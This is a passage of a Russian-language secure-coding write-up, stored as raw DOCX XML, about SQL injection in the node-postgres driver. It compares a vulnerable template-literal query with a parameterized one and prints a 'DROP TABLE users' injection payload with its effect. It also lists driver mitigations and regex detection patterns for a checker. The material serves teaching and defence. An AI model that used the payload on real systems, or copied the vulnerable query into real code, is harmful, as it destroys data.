          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    `SELECT id, email FROM users WHERE name = '${name}'`);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  res.json(result.rows);</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Template literal без values-массива. node-postgres получает строку и отправляет её одним simple-query сообщением.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Безопасный код.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">app.get('/users', async (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  const { name } = req.query;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  const result = await client.query(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    'SELECT id, email FROM users WHERE name = $1', [name]);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  res.json(result.rows);</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values как второй аргумент. node-postgres формирует Parse + Bind + Execute, значение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идёт как Bind-параметр.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload (подставляется вместо `name`):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">x'; DROP TABLE users; --</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Путь 1: simple (уязвимый код, без values).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="14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SELECT id, email FROM users WHERE name = 'x'; DROP TABLE users; --'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Оба statement-а исполняются. node-postgres возвращает результаты обоих в одном объекте: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">result.rows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> содержит rows от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result.rowCount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — от последней команды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 0), а массив всех команд доступен через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">result.results</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (внутреннее поле, в публичном API недокументировано стабильно). Приложение увидит «нормальный» JSON-ответ от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 таблица уже удалена, ошибки не будет.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Путь 2: extended (безопасный код, с values).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Значение payload едет как Bind-аргумент:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Parse:   SELECT id, email FROM users WHERE name = $1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Bind:    $1 = 'x''; DROP TABLE users; --'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Execute: 0 rows</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Если разработчик передаёт values, но в SQL-тексте присутствует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между значимыми токенами:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">await client.query('SELECT 1; DROP TABLE users', []);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сервер отвечает:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">error: cannot insert multiple commands into a prepared statement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В JS — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">err.code === '42601'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err.routine === 'transformRawStmt'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Promise rejects, ни одна команда не исполнилась.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Что отличает node-postgres от других драйверов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Отсутствие client-side экранирования</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> даже в simple-режиме. У psycopg2, pgjdbc-simple, pgx-simple — экранирование значений на клиенте есть; у node-postgres только два режима: либо extended с раздельными сообщениями, либо raw simple без обработки.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Оба результата возвращаются в одном `result`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> при удачном стакинге (R20). У asyncpg виден только последний, у psycopg3 — через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nextset()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, у node-postgres — в одном объекте сразу. Это упрощает эксфильтрацию через UNION + второй statement.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Template literals — синтаксический трап</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Удобство JavaScript template literals (`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT ${x}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">`) делает уязвимую форму короче и эстетичнее безопасной. Это статистически частая ошибка в Express/Fastify-кодбазах.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`pg-format`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (отдельный npm-пакет, не часть </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) предоставляет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">format('SELECT %L', value)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format('SELECT %I', identifier)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для безопасной композиции — это аналог </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">psycopg.sql.SQL()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Без него безопасной композиции identifiers нет в стандартном API.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Mitigations специфичные для драйвера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Всегда передавать values вторым массивом-аргументом. В коде судьи: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">client\.query\(\s*[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client\.query\(\s*[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pool\.query\(\s*[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Любой template literal без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после — критично.</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pg-format</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для динамических identifiers: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">format('SELECT * FROM %I WHERE id = %L', tableName, id)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Альтернатива — whitelist имён таблиц с проверкой до query.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ORM (Prisma, Drizzle, Kysely, Sequelize) поверх </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> строит параметризованные запросы автоматически. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$queryRaw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в Prisma и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sql.raw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в Drizzle — escape hatch, требующий тех же предосторожностей, что и сырой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg.query</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Avoid </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg-native</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> без необходимости: это libpq-обёртка, поведение для multi-statement отличается (libpq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 всегда simple).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коде судьи: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg\.query\(.*\$\{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format!.*pg\.query</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, конкатенация SQL-строк перед вызовом </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">query</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 7.0 (2017) — стабильное API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">client.query(text, values)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. До 7.0 был callback-only, та же логика.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8.x — текущая, добавлены Promise-API улучшения, поведение по протоколу не меняется.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pg-native</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (libpq-binding) — отдельный пакет, поведение наследуется от libpq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PQexecParams</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node-postgres docs: «Queries» — https://node-postgres.com/features/queries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node-postgres docs: «Parameterized query» — https://node-postgres.com/features/queries#parameterized-query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pg-format: https://github.com/datalanche/node-pg-format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issue #757 (multi-statement behavior) — https://github.com/brianc/node-postgres/issues/757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issue #1400 — https://github.com/brianc/node-postgres/issues/1400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R20 (sources/research.md, строки 337–338)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
